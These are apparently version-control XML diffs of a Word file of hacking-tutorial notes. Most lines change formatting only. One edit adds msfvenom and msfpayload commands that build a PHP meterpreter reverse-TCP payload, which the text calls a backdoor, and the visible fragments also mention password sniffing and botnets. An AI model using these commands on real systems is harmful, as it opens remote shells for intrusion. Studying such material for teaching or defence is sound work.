+    <w:abstractNumId w:val="13"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14203,7 +14619,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="25"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14233,7 +14649,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="8">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14263,7 +14679,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="26"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14293,73 +14709,76 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="13">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="14">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="15">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="16">
     <w:abstractNumId w:val="10"/>
   </w:num>
-  <w:num w:numId="14">
-    <w:abstractNumId w:val="8"/>
-  </w:num>
-  <w:num w:numId="15">
-    <w:abstractNumId w:val="13"/>
-  </w:num>
-  <w:num w:numId="16">
-    <w:abstractNumId w:val="9"/>
-  </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="18">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="19">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="20">
+    <w:abstractNumId w:val="28"/>
+  </w:num>
+  <w:num w:numId="21">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="22">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="23">
     <w:abstractNumId w:val="27"/>
   </w:num>
-  <w:num w:numId="21">
-    <w:abstractNumId w:val="5"/>
+  <w:num w:numId="24">
+    <w:abstractNumId w:val="22"/>
   </w:num>
-  <w:num w:numId="22">
+  <w:num w:numId="25">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="26">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="27">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="23">
-    <w:abstractNumId w:val="26"/>
-  </w:num>
-  <w:num w:numId="24">
-    <w:abstractNumId w:val="21"/>
-  </w:num>
-  <w:num w:numId="25">
-    <w:abstractNumId w:val="15"/>
-  </w:num>
-  <w:num w:numId="26">
-    <w:abstractNumId w:val="23"/>
-  </w:num>
-  <w:num w:numId="27">
+  <w:num w:numId="28">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="28">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
   <w:num w:numId="29">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="30">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="31">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="32">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
+  </w:num>
+  <w:num w:numId="33">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
@@ -14817,7 +15236,6 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading3Char"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
     <w:rsid w:val="007B7E72"/>
@@ -15287,7 +15705,6 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Heading3"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:rsid w:val="007B7E72"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
@@ -16339,6 +16756,13 @@
         </dgm:presLayoutVars>
       </dgm:prSet>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{DA789D76-2ED8-45A2-981D-3BD7CFC38014}" type="pres">
       <dgm:prSet presAssocID="{32CAB45C-5504-43F4-BD0B-E6BB848F8D66}" presName="firstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6" custScaleX="77428" custScaleY="77607">
@@ -16358,6 +16782,13 @@
     <dgm:pt modelId="{220F6836-5000-4BC1-8FE8-9539F8D4CCDC}" type="pres">
       <dgm:prSet presAssocID="{32681F8D-9D8E-4727-8479-EA7057C17516}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="5"/>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{9AEC3832-438D-4221-B6E6-1F413B84BB9D}" type="pres">
       <dgm:prSet presAssocID="{DB6C199B-2444-4A39-89D8-D62BE1923D5A}" presName="middleNode" presStyleCnt="0"/>
@@ -16385,6 +16816,13 @@
     <dgm:pt modelId="{66F318BB-222F-4159-A34F-C52A62A28F62}" type="pres">
       <dgm:prSet presAssocID="{9534400A-60B4-4180-B3F1-AFD424AE68CE}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="5"/>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{FB7E4BC7-26C6-4F90-BB14-059544BB36D5}" type="pres">
       <dgm:prSet presAssocID="{0F52D196-7939-437B-91DB-B98A69237BEA}" presName="middleNode" presStyleCnt="0"/>
@@ -16401,10 +16839,24 @@
         </dgm:presLayoutVars>
       </dgm:prSet>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{A120EEDA-63B5-4BF5-B2C4-813ACBA210CA}" type="pres">
       <dgm:prSet presAssocID="{DB71D523-8951-4851-923D-2052681B332D}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="5"/>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{4FDC543E-C148-4881-AD9F-47C07A971BBA}" type="pres">
       <dgm:prSet presAssocID="{73C8B386-D87A-40C5-BFB8-16DDFACC7052}" presName="middleNode" presStyleCnt="0"/>
@@ -16432,6 +16884,13 @@
     <dgm:pt modelId="{FB9DD9DF-E856-4125-B7F2-5FFADD10B34B}" type="pres">
       <dgm:prSet presAssocID="{E95CE5FF-4FBA-40D2-829D-54F564B6BF8E}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="5"/>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{50CF3BBF-AEA7-45B5-9AEB-E6312F6A7282}" type="pres">
       <dgm:prSet presAssocID="{E13AA509-F635-4BD3-8E3D-1AE8A3F13742}" presName="middleNode" presStyleCnt="0"/>
@@ -16448,10 +16907,24 @@
         </dgm:presLayoutVars>
       </dgm:prSet>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{5922692C-701D-4F11-A7C8-902588B2087C}" type="pres">
       <dgm:prSet presAssocID="{698CB340-EE48-4490-B29F-F4E0DBB05DFC}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="4" presStyleCnt="5"/>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{61C3E4CA-7425-476B-AD9D-D5AB86098096}" type="pres">
       <dgm:prSet presAssocID="{B170CED5-068A-4D1F-8945-28B6D2132492}" presName="lastNode" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6" custScaleX="89817" custScaleY="87496">
@@ -16460,6 +16933,13 @@
         </dgm:presLayoutVars>
       </dgm:prSet>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
   </dgm:ptLst>
   <dgm:cxnLst>
@@ -18582,7 +19062,7 @@
     <w:charset w:val="00"/>
     <w:family w:val="roman"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002AFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Symbol">
     <w:panose1 w:val="05050102010706020507"/>
@@ -18610,14 +19090,14 @@
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002AFF" w:usb1="4000ACFF" w:usb2="00000001" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E0002AFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Calibri Light">
     <w:panose1 w:val="020F0302020204030204"/>
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="A0002AEF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E0002AFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
 </w:fonts>
 </file>
@@ -18641,6 +19121,7 @@
     <w:rsid w:val="001A5E18"/>
     <w:rsid w:val="00234847"/>
     <w:rsid w:val="00314E12"/>
+    <w:rsid w:val="004E6FD1"/>
     <w:rsid w:val="004F3814"/>
     <w:rsid w:val="005D2E6F"/>
     <w:rsid w:val="006E4C0C"/>
@@ -19380,7 +19861,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7B84641B-06F3-4F45-96DC-943E968650D4}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1833CA6D-401B-45F8-A8DA-08669C86A291}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

</xml_diff>

<commit_message>
update: just changed the cross site scripting cmd
</commit_message>
<xml_diff>
--- a/CyberSecurity.docx
+++ b/CyberSecurity.docx
@@ -16,6 +16,7 @@
         <w:lock w:val="contentLocked"/>
         <w:group/>
       </w:sdtPr>
+      <w:sdtEndPr/>
       <w:sdtContent>
         <w:sdt>
           <w:sdtPr>
@@ -27,6 +28,7 @@
             <w:dataBinding w:xpath="/ns0:BlogPostInfo/ns0:PostTitle" w:storeItemID="{5F329CAD-B019-4FA6-9FEF-74898909AD20}"/>
             <w:text/>
           </w:sdtPr>
+          <w:sdtEndPr/>
           <w:sdtContent>
             <w:p>
               <w:pPr>
@@ -10031,8 +10033,62 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>For creating a payload: msfvenom –p php/meterpreter/reverse_tcp –f raw&gt;filename.php</w:t>
-      </w:r>
+        <w:t xml:space="preserve">For creating a payload: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">msfvenom –p php/meterpreter/reverse_tcp </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> lhost=ip lport=port </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–f raw&gt;filename.php</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>{using venom}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">msfpayload php/meterpreter/reverse_tcp </w:t>
+      </w:r>
+      <w:r>
+        <w:t>lhost=ip lport=port</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> R &gt;filename.php </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>{using payload}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>note that that the system is going to say msfpayload is deprecated but it still works.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:r>
@@ -10069,8 +10125,6 @@
       <w:r>
         <w:t>Executing this we will get a backdoor.</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p/>
     <w:p/>
@@ -10132,6 +10186,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Wrappers or Binders: these actually have the original software and work naturally.</w:t>
       </w:r>
     </w:p>
@@ -10410,6 +10465,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>One can sniff the following sensitive information from a network −</w:t>
       </w:r>
     </w:p>
@@ -10498,7 +10554,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Telnet passwords</w:t>
       </w:r>
     </w:p>
@@ -10711,6 +10766,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Tear Drop: </w:t>
       </w:r>
       <w:r>
@@ -10750,7 +10806,6 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>BOT NET: This is automated virus. This simply reflects itself and attacks all the victims that are vulnerable and opens the backdoor to the attacker.</w:t>
       </w:r>
     </w:p>
@@ -10879,6 +10934,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Char * name ;</w:t>
       </w:r>
     </w:p>
@@ -10894,7 +10950,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>command=(char*)malloc(30);</w:t>
       </w:r>
     </w:p>
@@ -19119,6 +19174,7 @@
     <w:rsidRoot w:val="008849E7"/>
     <w:rsid w:val="000337AC"/>
     <w:rsid w:val="001A5E18"/>
+    <w:rsid w:val="001F547F"/>
     <w:rsid w:val="00234847"/>
     <w:rsid w:val="00314E12"/>
     <w:rsid w:val="004E6FD1"/>
@@ -19861,7 +19917,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1833CA6D-401B-45F8-A8DA-08669C86A291}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{20D0E798-14F5-49F4-850A-844A16D2A6C1}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

</xml_diff>